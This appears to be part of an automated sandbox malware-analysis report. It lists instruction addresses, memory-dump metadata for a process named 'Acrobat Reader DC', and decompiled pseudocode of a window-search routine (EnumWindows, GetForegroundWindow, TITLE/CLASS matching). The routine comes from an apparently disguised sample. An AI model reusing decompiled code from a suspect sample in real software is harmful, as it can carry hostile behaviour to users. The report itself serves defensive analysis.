                                  0x0042ddc2
                                  0x0042ddc7
                                  0x0042ddca
                                  0x0042ddd1
                                  0x0042ddf6
                                  0x0042ddfb
                                  0x00000000
                                  0x00000000
                                  0x0042de01
                                  0x0042de01
                                  0x0042de03
                                  0x0042de03
                                  0x0042de09
                                  0x0042de11
                                  0x0042de13
                                  0x0042de1f
                                  0x0042de2c
                                  0x0042de32
                                  0x0042de32
                                  0x0042de38
                                  0x0042de3f
                                  0x0042de76
                                  0x0042de78
                                  0x0042de81
                                  0x0042de83
                                  0x0042de45
                                  0x0042de49
                                  0x0042de4d
                                  0x0042de4f
                                  0x0042de55
                                  0x0042de55
                                  0x0042de5b
                                  0x0042de5d
                                  0x0042de64
                                  0x0042de6c
                                  0x0042de6c
                                  0x0042de8f
                                  0x0042de96
                                  0x0042de9c
                                  0x00000000
                                  0x0042de9c
                                  0x0042ddd7
                                  0x0042dddc
                                  0x0042ddec
                                  0x00000000
                                  0x0042ddec
                                  0x0042dde2
                                  0x00000000
                                  0x0042dde2
                                  0x0042dd58
                                  0x0042dd5f
                                  0x0042dd61
                                  0x0042dd63
                                  0x00000000
                                  0x00000000
                                  0x0042dd69
                                  0x0042dd7b
                                  0x0042dd7b
                                  0x0042dd81
                                  0x0042dd83
                                  0x0042dd8a
                                  0x0042dd90
                                  0x0042dd90
                                  0x0042dd96
                                  0x0042dd9b
                                  0x0042dda1
                                  0x0042dda5
                                  0x00000000
                                  0x0042dda5
                                  0x0042dd6f
                                  0x0042dd75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004092fa
                                  0x004092fd
                                  0x004094d1
                                  0x004094d7
                                  0x004094de
                                  0x00409505
                                  0x00409505
                                  0x0040950b
                                  0x0040950e
                                  0x00000000
                                  0x00000000
                                  0x0042dec0
                                  0x0042dec3
                                  0x0042dec6
                                  0x00000000
                                  0x0042decc
                                  0x0042decc
                                  0x00000000
                                  0x0042defc
                                  0x00000000
                                  0x00000000
                                  0x0042dfdc
                                  0x0042dfe1
                                  0x0042dfe3
                                  0x0042dfe5
                                  0x00000000
                                  0x00000000
                                  0x0042dfeb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042ded4
                                  0x0042df01
                                  0x0042df01
                                  0x0042df03
                                  0x0042df05
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042dedf
                                  0x0042dee4
                                  0x0042dee6
                                  0x0042dee8
                                  0x0042df0b
                                  0x0042df14
                                  0x0042df19
                                  0x0042df23
                                  0x0042df29
                                  0x0042df31
                                  0x0042df36
                                  0x0042df38
                                  0x0042df38
                                  0x00000000
                                  0x00000000
                                  0x0042df3e
                                  0x0042df40
                                  0x0042dfb4
                                  0x0042dfba
                                  0x0042dfbb
                                  0x0042dfc2
                                  0x0042dfcc
                                  0x0042dfd1
                                  0x00000000
                                  0x0042dfd1
                                  0x0042df46
                                  0x0042df46
                                  0x0042df4c
                                  0x0042df4f
                                  0x0042df5e
                                  0x0042df6f
                                  0x0042df76
                                  0x0042df81
                                  0x0042df88
                                  0x0042df8d
                                  0x0042df95
                                  0x0042df95
                                  0x0042df98
                                  0x0042dfa3
                                  0x0042dfaa
                                  0x0042dfaf
                                  0x00000000
                                  0x0042dfaf
                                  0x0042df55
                                  0x0042df58
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042df58
                                  0x0042deee
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042decc
                                  0x00409520
                                  0x00409520
                                  0x00409520
                                  0x00409525
                                  0x00000000
                                  0x00000000
                                  0x00409530
                                  0x00409535
                                  0x0040953a
                                  0x0040953c
                                  0x00409548
                                  0x0040954d
                                  0x0040954f
                                  0x00409556
                                  0x0040955c
                                  0x00409561
                                  0x00409561
                                  0x0040954f
                                  0x0040956f
                                  0x00409574
                                  0x00409576
                                  0x00409578
                                  0x00409270
                                  0x00409277
                                  0x0042d7f3
                                  0x0042d7fa
                                  0x0042d801
                                  0x0042d801
                                  0x00409284
                                  0x0042e140
                                  0x0042e146
                                  0x0042e14e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040957e
                                  0x00000000
                                  0x0040957e
                                  0x00409578
                                  0x0042d7dd
                                  0x0042d7e4
                                  0x00000000
                                  0x0042d7e4
                                  0x004094e6
                                  0x004094eb
                                  0x004094ed
                                  0x004094ef
                                  0x00000000
                                  0x00000000
                                  0x004094f1
                                  0x004094f3
                                  0x0040958c
                                  0x0040958c
                                  0x00409593
                                  0x0042deac
                                  0x0042deb2
                                  0x0042deb6
                                  0x0042deb6
                                  0x00409599
                                  0x00409599
                                  0x004095a0
                                  0x00000000
                                  0x004095a0
                                  0x004094f9
                                  0x004094ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409327
                                  0x00409327
                                  0x0040932a
                                  0x00409330
                                  0x00409332
                                  0x00409333
                                  0x00409336
                                  0x0040933c
                                  0x0042dff6
                                  0x0042dff6
                                  0x00000000
                                  0x0040934a
                                  0x0040934d
                                  0x00409353
                                  0x00000000
                                  0x00000000
                                  0x00409359
                                  0x0040935b
                                  0x00409360
                                  0x00409364
                                  0x00409366
                                  0x0040936c
                                  0x004093ae
                                  0x004093b1
                                  0x00409450
                                  0x00409451
                                  0x00409454
                                  0x0042e074
                                  0x0042e074
                                  0x0042e07f
                                  0x00000000
                                  0x0042e07f
                                  0x00409461
                                  0x00000000
                                  0x00409475
                                  0x00409477
                                  0x0040947e
                                  0x00409485
                                  0x0040948d
                                  0x00409491
                                  0x00409493
                                  0x00409495
                                  0x004094a0
                                  0x004094a5
                                  0x004094a7
                                  0x004094a9
                                  0x004094ac
                                  0x004094b0
                                  0x004094b3
                                  0x004094b8
                                  0x0042e005
                                  0x0042e00d
                                  0x0042e00d
                                  0x004094b8
                                  0x004094be
                                  0x004094c5
                                  0x00000000
                                  0x00000000
                                  0x0040946b
                                  0x00000000
                                  0x00000000
                                  0x0042e017
                                  0x0042e01e
                                  0x0042e023
                                  0x0042e025
                                  0x0042e041
                                  0x0042e048
                                  0x0042e04d
                                  0x0042e04f
                                  0x0042e055
                                  0x0042e058
                                  0x0042e05c
                                  0x0042e05f
                                  0x0042e06a
                                  0x0042e06a
                                  0x0042e02b
                                  0x0042e02b
                                  0x0042e036
                                  0x0042e036
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409461
                                  0x004093bc
                                  0x004093c7
                                  0x004093cb
                                  0x004093d3
                                  0x004093d7
                                  0x004093dc
                                  0x004093de
                                  0x004093f5
                                  0x004093f5
                                  0x004093f9
                                  0x004093fb
                                  0x00409400
                                  0x00409402
                                  0x00409405
                                  0x00409407
                                  0x0042e0a6
                                  0x0042e0a7
                                  0x0042e0ac
                                  0x0042e0b2
                                  0x0042e0b3
                                  0x0042e0b8
                                  0x0042e0b8
                                  0x0040940d
                                  0x0040940e
                                  0x00409413
                                  0x00409416
                                  0x00409416
                                  0x0040941a
                                  0x0040941e
                                  0x00409421
                                  0x0042e0c0
                                  0x0042e0c4
                                  0x0042e0c6
                                  0x0042e0cd
                                  0x0042e0d3
                                  0x0042e0d4
                                  0x0042e0d9
                                  0x0042e0d9
                                  0x00409427
                                  0x00409427
                                  0x0040942a
                                  0x0042e0e1
                                  0x0042e0e5
                                  0x0042e0e7
                                  0x0042e0ee
                                  0x0042e0ee
                                  0x00409430
                                  0x00409430
                                  0x00409433
                                  0x0042e0fc
                                  0x00409439
                                  0x00409439
                                  0x0040943c
                                  0x0042e106
                                  0x0042e10a
                                  0x0042e10d
                                  0x0042e10e
                                  0x0042e116
                                  0x0042e117
                                  0x0042e11c
                                  0x00409442
                                  0x00409442
                                  0x00409445
                                  0x0042e124
                                  0x0042e128
                                  0x0042e12a
                                  0x0042e131
                                  0x0042e131
                                  0x0042e12a
                                  0x00409445
                                  0x0040943c
                                  0x00409433
                                  0x0040942a
                                  0x00000000
                                  0x00409421
                                  0x004093e0
                                  0x004093e7
                                  0x004093ea
                                  0x004093ef
                                  0x0042e089
                                  0x0042e091
                                  0x0042e09a
                                  0x00000000
                                  0x0042e09a
                                  0x00000000
                                  0x0040936e
                                  0x00409374
                                  0x00000000
                                  0x00409374
                                  0x0040936c
                                  0x0040933c
                                  0x004092fd
                                  0x004092eb
                                  0x0040924d
                                  0x0042d7cb
                                  0x0042d7d2
                                  0x00000000
                                  0x00000000
                                  0x0042d7d8
                                  0x0040926a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040926a
                                  0x00000000
                                  0x00409230

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 330 46ed8e-46ee39 call 4109e0 * 2 call 40e0a0 * 2 call 402160 call 40bc70 * 3 347 46ee4a-46ee4e 330->347 348 46ee3b-46ee47 call 4152bb 330->348 350 46ee50-46ee5a call 469296 347->350 351 46ee61-46ee6d call 436565 347->351 348->347 350->351 357 46eec5-46eed7 call 401c90 351->357 358 46ee6f-46ee77 call 436565 351->358 363 46eedd-46eeec call 401c90 357->363 364 46f2f9-46f305 call 436565 357->364 358->357 365 46ee79-46eec2 GetForegroundWindow call 44cdaf call 436299 call 402250 * 3 358->365 363->364 372 46eef2-46eefd 363->372 374 46f307-46f310 call 40e0a0 364->374 375 46f315-46f319 364->375 378 46ef00-46ef1c call 461a5b 372->378 374->375 376 46f322-46f32a 375->376 377 46f31b 375->377 381 46f335-46f339 376->381 382 46f32c-46f330 call 410bc0 376->382 377->376 378->364 391 46ef22-46ef36 call 445ae0 378->391 386 46f34a-46f354 381->386 387 46f33b-46f33f 381->387 382->381 392 46f356-46f363 GetDesktopWindow EnumChildWindows 386->392 393 46f365 EnumWindows 386->393 387->386 390 46f341-46f345 call 410bc0 387->390 390->386 402 46f1f5-46f209 call 445ae0 391->402 403 46ef3c-46ef50 call 445ae0 391->403 397 46f36b-46f385 call 4457df call 4109e0 392->397 393->397 412 46f387-46f390 call 44cdaf 397->412 413 46f395-46f3be call 402250 * 3 397->413 414 46f1ce-46f1f2 call 402250 * 3 402->414 415 46f20b-46f20f 402->415 416 46ef56-46ef6a call 445ae0 403->416 417 46f24b-46f25f call 445ae0 403->417 412->413 421 46f225-46f248 call 402250 * 3 415->421 422 46f211-46f21f 415->422 431 46f283-46f2a2 call 432c30 IsWindow 416->431 432 46ef70-46ef84 call 445ae0 416->432 417->414 433 46f265-46f26b GetForegroundWindow 417->433 422->421 431->421 453 46f2a4-46f2a5 431->453 449 46ef86-46ef8b 432->449 450 46efe1-46eff5 call 445ae0 432->450 438 46f26c-46f27a call 44cdaf 433->438 438->431 457 46f2a7-46f2cd call 402250 * 3 449->457 458 46ef91-46efa8 call 401070 449->458 462 46eff7-46f009 call 40e0a0 450->462 463 46f00e-46f022 call 445ae0 450->463 453->438 468 46efa9-46efb2 call 46906d 458->468 462->378 476 46f024-46f03a call 401070 463->476 477 46f03f-46f053 call 445ae0 463->477 468->378 479 46efb8-46efde call 402250 * 3 468->479 476->468 485 46f074-46f088 call 445ae0 477->485 486 46f055-46f06f call 413190 477->486 495 46f08a-46f0a4 call 413190 485->495 496 46f0a9-46f0bd call 445ae0 485->496 486->378 495->378 502 46f0de-46f0f2 call 445ae0 496->502 503 46f0bf-46f0d9 call 413190 496->503 508 46f0f4-46f10e call 413190 502->508 509 46f113-46f127 call 445ae0 502->509 503->378 508->378 514 46f145-46f159 call 445ae0 509->514 515 46f129-46f140 call 413190 509->515 520 46f17a-46f18e call 445ae0 514->520 521 46f15b-46f16f call 445ae0 514->521 515->378 527 46f1b4-46f1c8 call 44cd93 520->527 528 46f190-46f195 520->528 521->414 526 46f171-46f175 521->526 526->378 527->378 527->414 529 46f2d0-46f2f6 call 402250 * 3 528->529 530 46f19b-46f1af call 40e0a0 528->530 530->378
                                  C-Code - Quality: 78%
                                  			E0046ED8E(void* __eflags, void* __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24, char _a28, char _a32) {
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HWND__* _v80;
				signed int _v84;
				char _v88;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				void* _t158;
				signed int _t173;
				short* _t189;
				signed int _t193;
				signed int _t194;
				signed int _t198;
				signed int _t209;
				signed int _t211;
				char* _t214;
				signed int _t215;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int* _t252;
				signed int _t258;
				signed int _t263;
				signed int _t269;
				signed int* _t273;
				signed int _t277;
				intOrPtr* _t343;
				struct HWND__* _t371;
				signed int* _t373;
				signed int _t378;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t398;

				_t398 = __fp0;
				_t393 = __eflags;
				_t380 = (_t378 & 0xfffffff8) - 0x54;
				_t158 = E004109E0(_t157, _a16);
				_t343 = _a4;
				_v72 = _t343 + 0xec;
				E004109E0(_t158, _t343 + 0xec);
				_t323 = _a8;
				 *((char*)(_t343 + 4)) = _a32;
				 *((char*)(_t343 + 5)) = _a28;
				_v88 = _t343 + 0x14;
				E0040E0A0(_t343 + 0x14, _a8);
				_t361 = _t343 + 0x24;
				_v80 = _t343 + 0x24;
				E0040E0A0(_t343 + 0x24, _a12);
				_v88 = _t343 + 0xbc;
				E00402160(_t343 + 0xbc, 0x484ea8, _a8, _t343);
				 *(_t343 + 0x10) = _a20;
				 *(_t343 + 0xcc) = 1;
				 *((char*)(_t343 + 0xc)) = 1;
				 *((intOrPtr*)(_t343 + 8)) = 0;
				 *((intOrPtr*)(_t343 + 0xd0)) = 0;
				 *((intOrPtr*)(_t343 + 0xe4)) = 0;
				E0040BC70( &_v60, _t393);
				E0040BC70( &_v44, _t393);
				_t287 =  &_v28;
				E0040BC70( &_v28, _t393);
				_t169 =  *(_t343 + 0x10);
				if( *(_t343 + 0x10) < 0) {
					_t269 = E004152BB(_t323, _t169);
					_t380 = _t380 + 4;
					 *(_t343 + 0x10) = _t269;
					 *((char*)(_t343 + 0xc)) = 0;
				}
				_t395 =  *(_t343 + 0x10) - 4;
				if( *(_t343 + 0x10) == 4) {
					E00469296(_v88, _t395, _t398, _v88);
					 *(_t343 + 0x10) = 1;
				}
				if(E00436565(_v88) == 0 || E00436565(_t361) == 0) {
					_t362 = _v88;
					__eflags =  *((short*)(E00401C90(0, _v88, __eflags))) - 0x5b;
					_t273 = _a4;
					if(__eflags != 0) {
						L54:
						_t173 = E00436565( &_v20);
						__eflags = _t173;
						if(_t173 == 0) {
							E0040E0A0(_v88,  &_v20);
						}
						__eflags = _t273[2];
						if(_t273[2] == 0) {
							_t273[2] = 1;
						}
						_t273[2] = _t273[2] | 0x00000004;
						__eflags = _t273[3];
						if(_t273[3] == 0) {
							E00410BC0(_v76);
						}
						__eflags = _t273[2] & 0x00000001;
						if((_t273[2] & 0x00000001) != 0) {
							__eflags = _t273[3];
							if(_t273[3] == 0) {
								E00410BC0(_v88);
							}
						}
						__eflags = _a24;
						_push(_t273);
						_push(0x46130d);
						if(_a24 == 0) {
							EnumWindows(); // executed
						} else {
							EnumChildWindows(GetDesktopWindow(), ??, ??);
						}
						_t345 = _a16;
						E004109E0(E004457DF(_a16, _v76), _v76);
						__eflags = _t273[0x39] - 1;
						if(_t273[0x39] >= 1) {
							E0044CDAF( *((intOrPtr*)(_t345 + 4)), _t345, _t273,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 4)))))));
						}
						E00402250( &_v24);
						E00402250( &_v40);
						E00402250( &_v56);
						return _t273[0x39];
					} else {
						_t189 = E00401C90(_t273[6] - 1, _t362, __eflags);
						__eflags =  *_t189 - 0x5d;
						if( *_t189 == 0x5d) {
							_v84 = 1;
							_t350 = _t273[6] - 2;
							__eflags = _t273[6] - 2;
							while(1) {
								__eflags = E00461A5B(_v88, _t398, _v88,  &_v52,  &_v36,  &_v84, _t350);
								if(__eflags == 0) {
									goto L54;
								}
								_t193 = E00445AE0(__eflags,  &_v52, L"LAST");
								_t381 = _t380 + 8;
								__eflags = _t193;
								if(__eflags != 0) {
									_t194 = E00445AE0(__eflags,  &_v36, 0x484ea8);
									__eflags = _t194;
									if(_t194 == 0) {
										goto L42;
									} else {
										_t277 =  *_t273;
										__eflags = _t277;
										if(_t277 == 0) {
											goto L46;
										} else {
											_push( &_v80);
											_v80 =  *_t277;
											_push(_a16);
											goto L8;
										}
									}
								} else {
									_t303 =  &_v52;
									_t209 = E00445AE0(__eflags,  &_v52, L"ACTIVE");
									_t383 = _t381 + 8;
									__eflags = _t209;
									if(__eflags != 0) {
										_t211 = E00445AE0(__eflags,  &_v36, 0x484ea8);
										__eflags = _t211;
										if(_t211 == 0) {
											goto L42;
										} else {
											_push(GetForegroundWindow());
											goto L49;
										}
									} else {
										_t215 = E00445AE0(__eflags,  &_v52, L"HANDLE");
										_t385 = _t383 + 8;
										__eflags = _t215;
										if(__eflags != 0) {
											E00432C30(__eflags, _v36,  &_v80);
											_t371 = _v80;
											_t218 = IsWindow(_t371);
											__eflags = _t218;
											if(_t218 == 0) {
												L46:
												E00402250( &_v20);
												E00402250( &_v36);
												E00402250( &_v52);
												__eflags = 0;
												return 0;
											} else {
												_push(_t371);
												L49:
												_push(_t273);
												E0044CDAF(_t303, _t350);
												_v88 =  *( *_t273);
												_t214 =  &_v88;
												goto L7;
											}
										} else {
											_t220 = E00445AE0(__eflags,  &_v52, L"REGEXPTITLE");
											_t380 = _t385 + 8;
											__eflags = _t220;
											if(__eflags == 0) {
												_t222 = E00445AE0(__eflags,  &_v52, L"CLASS");
												_t380 = _t380 + 8;
												__eflags = _t222;
												if(__eflags == 0) {
													_t223 = E00445AE0(__eflags,  &_v52, L"REGEXPCLASS");
													_t380 = _t380 + 8;
													__eflags = _t223;
													if(__eflags == 0) {
														_t224 = E00445AE0(__eflags,  &_v52, "X");
														_t387 = _t380 + 8;
														__eflags = _t224;
														if(__eflags == 0) {
															_t225 = E00445AE0(__eflags,  &_v52, "Y");
															_t388 = _t387 + 8;
															__eflags = _t225;
															if(__eflags == 0) {
																_t227 = E00445AE0(__eflags,  &_v52, "W");
																_t389 = _t388 + 8;
																__eflags = _t227;
																if(__eflags == 0) {
																	_t228 = E00445AE0(__eflags,  &_v52, "H");
																	_t390 = _t389 + 8;
																	__eflags = _t228;
																	if(__eflags == 0) {
																		_t229 = E00445AE0(__eflags,  &_v52, L"INSTANCE");
																		_t391 = _t390 + 8;
																		__eflags = _t229;
																		if(__eflags == 0) {
																			_t231 = E00445AE0(__eflags,  &_v52, L"ALL");
																			_t392 = _t391 + 8;
																			__eflags = _t231;
																			if(__eflags == 0) {
																				_t232 = E00445AE0(__eflags,  &_v52, L"TITLE");
																				_t380 = _t392 + 8;
																				__eflags = _t232;
																				if(__eflags == 0) {
																					_t233 = E0044CD93(__eflags,  &_v52, 0x484ea8);
																					_t380 = _t380 + 8;
																					__eflags = _t233;
																					if(_t233 == 0) {
																						continue;
																					} else {
																						goto L42;
																					}
																				} else {
																					_t234 = _t273[2];
																					__eflags = _t234 & 0x00000002;
																					if((_t234 & 0x00000002) != 0) {
																						E00402250( &_v20);
																						E00402250( &_v36);
																						E00402250( &_v52);
																						return 0xfffffffc;
																					} else {
																						_t273[2] = _t234 | 0x00000001;
																						E0040E0A0( &_v20,  &_v36);
																						continue;
																					}
																				}
																			} else {
																				_t242 = E00445AE0(__eflags,  &_v36, 0x484ea8);
																				_t380 = _t392 + 8;
																				__eflags = _t242;
																				if(_t242 == 0) {
																					L42:
																					E00402250( &_v20);
																					E00402250( &_v36);
																					_t198 = E00402250( &_v52) | 0xffffffff;
																					__eflags = _t198;
																					return _t198;
																				} else {
																					_t273[2] = _t273[2] | 0x00000040;
																					continue;
																				}
																			}
																		} else {
																			_t273[2] = _t273[2] | 0x00000020;
																			_push(_v36);
																			_t243 = E00413190();
																			_t380 = _t391 + 4;
																			_t273[0x33] = _t243;
																			continue;
																		}
																	} else {
																		_t273[2] = _t273[2] | 0x00000400;
																		_push(_v36);
																		_t245 = E00413190();
																		_t380 = _t390 + 4;
																		_t273[0x38] = _t245;
																		continue;
																	}
																} else {
																	_t273[2] = _t273[2] | 0x00000200;
																	_push(_v36);
																	_t246 = E00413190();
																	_t380 = _t389 + 4;
																	_t273[0x37] = _t246;
																	continue;
																}
															} else {
																_t273[2] = _t273[2] | 0x00000100;
																_push(_v36);
																_t247 = E00413190();
																_t380 = _t388 + 4;
																_t273[0x36] = _t247;
																continue;
															}
														} else {
															_t273[2] = _t273[2] | 0x00000080;
															_push(_v36);
															_t249 = E00413190();
															_t380 = _t387 + 4;
															_t273[0x35] = _t249;
															continue;
														}
													} else {
														_t273[2] = _t273[2] | 0x00000010;
														_t373 =  &(_t273[0x1e]);
														E00401070(_t373);
														_push( &_v36);
														_t314 =  &_v60;
														_push( &_v60);
														goto L19;
													}
												} else {
													_t273[2] = _t273[2] | 0x00000008;
													E0040E0A0(_v80,  &_v36);
													continue;
												}
											} else {
												_t258 = _t273[2];
												__eflags = _t258 & 0x00000001;
												if((_t258 & 0x00000001) != 0) {
													E00402250( &_v20);
													E00402250( &_v36);
													E00402250( &_v52);
													return 0xfffffffd;
												} else {
													_t263 = _t258 | 0x00000002;
													__eflags = _t263;
													_t373 =  &(_t273[0xd]);
													_t273[2] = _t263;
													E00401070(_t373);
													_t314 =  &_v36;
													_push( &_v36);
													_push( &_v68);
													L19:
													_push(_t373);
													_t252 = E0046906D(_t314, __eflags);
													__eflags =  *_t252;
													if( *_t252 == 0) {
														continue;
													} else {
														E00402250( &_v20);
														E00402250( &_v36);
														E00402250( &_v52);
														return 0xfffffffe;
													}
												}
											}
										}
									}
								}
								goto L69;
							}
						}
						goto L54;
					}
				} else {
					E0044CDAF(_t287, _t343, _t343, GetForegroundWindow());
					_v96 =  *((intOrPtr*)( *_t343));
					_t214 =  &_v96;
					L7:
					_push(_t214);
					_push(_a16);
					L8:
					E00436299();
					E00402250( &_v28);
					E00402250( &_v44);
					E00402250( &_v60);
					return 1;
				}
				L69:
			}










































































                                  0x0046ed8e
                                  0x0046ed8e
                                  0x0046ed94
                                  0x0046ed9d
                                  0x0046eda2
                                  0x0046edab
                                  0x0046edaf
                                  0x0046edb4
                                  0x0046edc1
                                  0x0046edc4
                                  0x0046edc7
                                  0x0046edcb
                                  0x0046edd3
                                  0x0046edd7
                                  0x0046eddb
                                  0x0046edeb
                                  0x0046edef
                                  0x0046edf9
                                  0x0046ee00
                                  0x0046ee0a
                                  0x0046ee0e
                                  0x0046ee11
                                  0x0046ee17
                                  0x0046ee1d
                                  0x0046ee26
                                  0x0046ee2b
                                  0x0046ee2f
                                  0x0046ee34
                                  0x0046ee39
                                  0x0046ee3c
                                  0x0046ee41
                                  0x0046ee44
                                  0x0046ee47
                                  0x0046ee47
                                  0x0046ee4a
                                  0x0046ee4e
                                  0x0046ee55
                                  0x0046ee5a
                                  0x0046ee5a
                                  0x0046ee6d
                                  0x0046eec5
                                  0x0046eed0
                                  0x0046eed4
                                  0x0046eed7
                                  0x0046f2f9
                                  0x0046f2fe
                                  0x0046f303
                                  0x0046f305
                                  0x0046f310
                                  0x0046f310
                                  0x0046f315
                                  0x0046f319
                                  0x0046f31b
                                  0x0046f31b
                                  0x0046f322
                                  0x0046f326
                                  0x0046f32a
                                  0x0046f330
                                  0x0046f330
                                  0x0046f335
                                  0x0046f339
                                  0x0046f33b
                                  0x0046f33f
                                  0x0046f345
                                  0x0046f345
                                  0x0046f33f
                                  0x0046f34a
                                  0x0046f34e
                                  0x0046f34f
                                  0x0046f354
                                  0x0046f365
                                  0x0046f356
                                  0x0046f35d
                                  0x0046f35d
                                  0x0046f36f
                                  0x0046f379
                                  0x0046f37e
                                  0x0046f385
                                  0x0046f390
                                  0x0046f390
                                  0x0046f39f
                                  0x0046f3a8
                                  0x0046f3b1
                                  0x0046f3be
                                  0x0046eedd
                                  0x0046eee3
                                  0x0046eee8
                                  0x0046eeec
                                  0x0046eef5
                                  0x0046eefd
                                  0x0046eefd
                                  0x0046ef00
                                  0x0046ef1a
                                  0x0046ef1c
                                  0x00000000
                                  0x00000000
                                  0x0046ef2c
                                  0x0046ef31
                                  0x0046ef34
                                  0x0046ef36
                                  0x0046f1ff
                                  0x0046f207
                                  0x0046f209
                                  0x00000000
                                  0x0046f20b
                                  0x0046f20b
                                  0x0046f20d
                                  0x0046f20f
                                  0x00000000
                                  0x0046f211
                                  0x0046f21a
                                  0x0046f21b
                                  0x0046f21f
                                  0x00000000
                                  0x0046f21f
                                  0x0046f20f
                                  0x0046ef3c
                                  0x0046ef3c
                                  0x0046ef46
                                  0x0046ef4b
                                  0x0046ef4e
                                  0x0046ef50
                                  0x0046f255
                                  0x0046f25d
                                  0x0046f25f
                                  0x00000000
                                  0x0046f265
                                  0x0046f26b
                                  0x00000000
                                  0x0046f26b
                                  0x0046ef56
                                  0x0046ef60
                                  0x0046ef65
                                  0x0046ef68
                                  0x0046ef6a
                                  0x0046f28d
                                  0x0046f292
                                  0x0046f29a
                                  0x0046f2a0
                                  0x0046f2a2
                                  0x0046f225
                                  0x0046f229
                                  0x0046f232
                                  0x0046f23b
                                  0x0046f240
                                  0x0046f248
                                  0x0046f2a4
                                  0x0046f2a4
                                  0x0046f26c
                                  0x0046f26c
                                  0x0046f26d
                                  0x0046f276
                                  0x0046f27a
                                  0x00000000
                                  0x0046f27a
                                  0x0046ef70
                                  0x0046ef7a
                                  0x0046ef7f
                                  0x0046ef82
                                  0x0046ef84
                                  0x0046efeb
                                  0x0046eff0
                                  0x0046eff3
                                  0x0046eff5
                                  0x0046f018
                                  0x0046f01d
                                  0x0046f020
                                  0x0046f022
                                  0x0046f049
                                  0x0046f04e
                                  0x0046f051
                                  0x0046f053
                                  0x0046f07e
                                  0x0046f083
                                  0x0046f086
                                  0x0046f088
                                  0x0046f0b3
                                  0x0046f0b8
                                  0x0046f0bb
                                  0x0046f0bd
                                  0x0046f0e8
                                  0x0046f0ed
                                  0x0046f0f0
                                  0x0046f0f2
                                  0x0046f11d
                                  0x0046f122
                                  0x0046f125
                                  0x0046f127
                                  0x0046f14f
                                  0x0046f154
                                  0x0046f157
                                  0x0046f159
                                  0x0046f184
                                  0x0046f189
                                  0x0046f18c
                                  0x0046f18e
                                  0x0046f1be
                                  0x0046f1c3
                                  0x0046f1c6
                                  0x0046f1c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0046f190
                                  0x0046f190
                                  0x0046f193
                                  0x0046f195
                                  0x0046f2d4
                                  0x0046f2dd
                                  0x0046f2e6
                                  0x0046f2f6
                                  0x0046f19b
                                  0x0046f19e
                                  0x0046f1aa
                                  0x00000000
                                  0x0046f1aa
                                  0x0046f195
                                  0x0046f15b
                                  0x0046f165
                                  0x0046f16a
                                  0x0046f16d
                                  0x0046f16f
                                  0x0046f1ce
                                  0x0046f1d2
                                  0x0046f1db
                                  0x0046f1e9
                                  0x0046f1e9
                                  0x0046f1f2
                                  0x0046f171
                                  0x0046f171
                                  0x00000000
                                  0x0046f171
                                  0x0046f16f
                                  0x0046f129
                                  0x0046f12d
                                  0x0046f131
                                  0x0046f132
                                  0x0046f137
                                  0x0046f13a
                                  0x00000000
                                  0x0046f13a
